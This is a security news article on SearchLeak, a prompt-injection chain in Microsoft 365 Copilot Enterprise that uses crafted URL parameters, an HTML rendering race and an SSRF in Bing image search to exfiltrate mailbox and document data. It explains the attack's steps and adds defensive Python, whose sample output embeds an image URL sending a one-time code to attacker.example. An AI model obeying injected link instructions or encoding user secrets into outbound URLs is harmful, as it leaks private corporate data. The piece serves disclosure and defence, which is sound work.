Critical Microsoft 365 Copilot Vulnerability Allowed One-Click Data Theft via SearchLeak Attack
Key Takeaways
- Microsoft 365 Copilot Enterprise contained a critical vulnerability chain (SearchLeak, CVE-2026-42824) enabling one-click data theft without user awareness
- The attack exploited parameter-to-prompt injection, HTML rendering race conditions, and SSRF in combination to exfiltrate sensitive corporate data through Bing's image search feature
- Traditional security vulnerabilities like SSRF and HTML injection pose new risks when combined with prompt injection capabilities in AI systems
Summary
Security researchers at Varonis discovered SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot Enterprise that could allow attackers to steal sensitive data from a target's mailbox, OneDrive, or SharePoint account after a single click on a specially crafted URL. The attack could exfiltrate email content (including access codes and passwords), calendar events, meeting details, documents, and any other corporate data reachable through Copilot Enterprise Search. Microsoft addressed the vulnerability (CVE-2026-42824) in early June and rated it critical, the maximum severity.
The attack chains three weaknesses, none of which is sufficient for a meaningful attack on its own. First, a parameter-to-prompt injection weakness in how Copilot Search processes URL query parameters lets the attacker craft a link whose parameters instruct Copilot to search the victim's emails and extract specific data. Second, an HTML rendering race condition lets attacker-controlled image tags in Copilot's response reach the page, and fire their outbound image requests, before the browser-side sanitization completes. Third, a server-side request forgery (SSRF) weakness in Bing's "Search by Image" feature turns Bing into an unwitting exfiltration proxy: the image URL points at a Bing endpoint that the content security policy already permits, and Bing's servers then fetch the attacker-controlled URL embedded in it.
When combined, the steps form a seamless attack: the victim clicks the malicious link, Copilot executes the injected search instructions and produces a response with the stolen data encoded in an image URL, the browser requests that image before sanitization runs, and Bing fetches the attacker's URL, so the exfiltrated data lands in the attacker's web server logs. The victim sees only Copilot "thinking" for a moment, with no indication that anything was taken. Varonis researchers stress that familiar vulnerability classes such as SSRF and HTML injection become considerably more potent when they can be reached through prompt injection in an AI system.
Microsoft has already patched the vulnerability; no user action is required to mitigate the threat.
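As an added example (not Varonis's proof of concept and not Microsoft's code), the following Python models the two links of the chain that a defender can check mechanically: image tags in model output must be sanitized before they are inserted into the page, and an image URL on an allowlisted host must not carry a second, attacker-controlled URL in its query string for a server-side fetcher to follow. The allowlisted host, the hypothetical `fetch?url=` endpoint and the sample model output are constructed for this example. The first link of the chain, URL parameters becoming prompt instructions, has no equivalent filter; the fix there is not to execute URL-supplied text automatically.

```python
import re
from urllib.parse import urlparse, parse_qs

# Assumption for this example: the only host the assistant UI may load images
# from. Note that this host still receives everything in the query string, so
# the allowlist must hold only hosts you trust with model output.
IMAGE_HOST_ALLOWLIST = {"img.assistant.example"}

IMG_TAG = re.compile(r"""<img\b[^>]*?\bsrc\s*=\s*["']([^"']+)["'][^>]*>""", re.IGNORECASE)


def smuggled_urls(src: str) -> list[str]:
    """URLs carried inside the query string of `src` that point outside the allowlist.

    This is the image-proxy exfiltration pattern: the outer host is trusted, but the
    server behind it fetches whatever the parameter names, so a secret placed in the
    inner URL ends up in the inner host's access log.
    """
    found = []
    for values in parse_qs(urlparse(src).query).values():  # parse_qs percent-decodes
        for value in values:
            inner = urlparse(value)  # also catches scheme-relative //host/path values
            if inner.hostname and inner.hostname not in IMAGE_HOST_ALLOWLIST:
                found.append(value)
    return found


def classify_image_src(src: str) -> str:
    """Return 'allowed', 'blocked:host' or 'blocked:smuggled-url'."""
    outer = urlparse(src)
    if outer.scheme not in ("http", "https") or outer.hostname not in IMAGE_HOST_ALLOWLIST:
        return "blocked:host"
    if smuggled_urls(src):
        return "blocked:smuggled-url"
    return "allowed"


def sanitize_model_html(html: str) -> tuple[str, list[str]]:
    """Drop every <img> whose src fails classify_image_src; return (clean_html, blocked_srcs)."""
    blocked: list[str] = []

    def replace(match) -> str:
        src = match.group(1)
        if classify_image_src(src) == "allowed":
            return match.group(0)
        blocked.append(src)
        return ""

    return IMG_TAG.sub(replace, html), blocked


def image_requests_fired(model_html: str, sanitize_before_insert: bool) -> list[str]:
    """Model of the race: the browser requests every <img src> the moment the markup
    is inserted, so sanitizing *after* insertion cannot stop the first request."""
    if sanitize_before_insert:
        model_html, _ = sanitize_model_html(model_html)
    return IMG_TAG.findall(model_html)


# Constructed sample of model output: a benign image plus one that smuggles a
# secret to a third-party host through the allowlisted fetcher's `url` parameter.
SAMPLE_MODEL_HTML = (
    "<p>Here is your latest message summary.</p>"
    '<img src="https://img.assistant.example/logo.png">'
    '<img src="https://img.assistant.example/fetch?url='
    'https%3A%2F%2Fattacker.example%2Flog%3Fd%3DOTP-48213">'
)

if __name__ == "__main__":
    print("sanitize after insert :", image_requests_fired(SAMPLE_MODEL_HTML, False))
    print("sanitize before insert:", image_requests_fired(SAMPLE_MODEL_HTML, True))
```

Two caveats on the design: the check only recognises parameter values that parse as URLs with a hostname, so a fetcher that accepts bare hostnames or its own short identifiers needs a stricter rule (reject the endpoint entirely unless the inner target is allowlisted); and blocking the tag in the sanitizer does nothing if the sanitizer runs after the markup is in the DOM, which is exactly the ordering the race exploits.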
Editorial Opinion
SearchLeak exemplifies a troubling pattern in AI security: classical vulnerability classes that would be contained in traditional software become far more dangerous when they can be triggered through prompt injection. As enterprise AI systems like Copilot gain deeper access to sensitive data repositories, security teams must revisit their threat models to account for how older bug classes behave in this new context. The case shows why AI systems need security testing across every layer, from prompt handling down to the underlying infrastructure, before adversaries chain seemingly minor flaws into a critical exploit.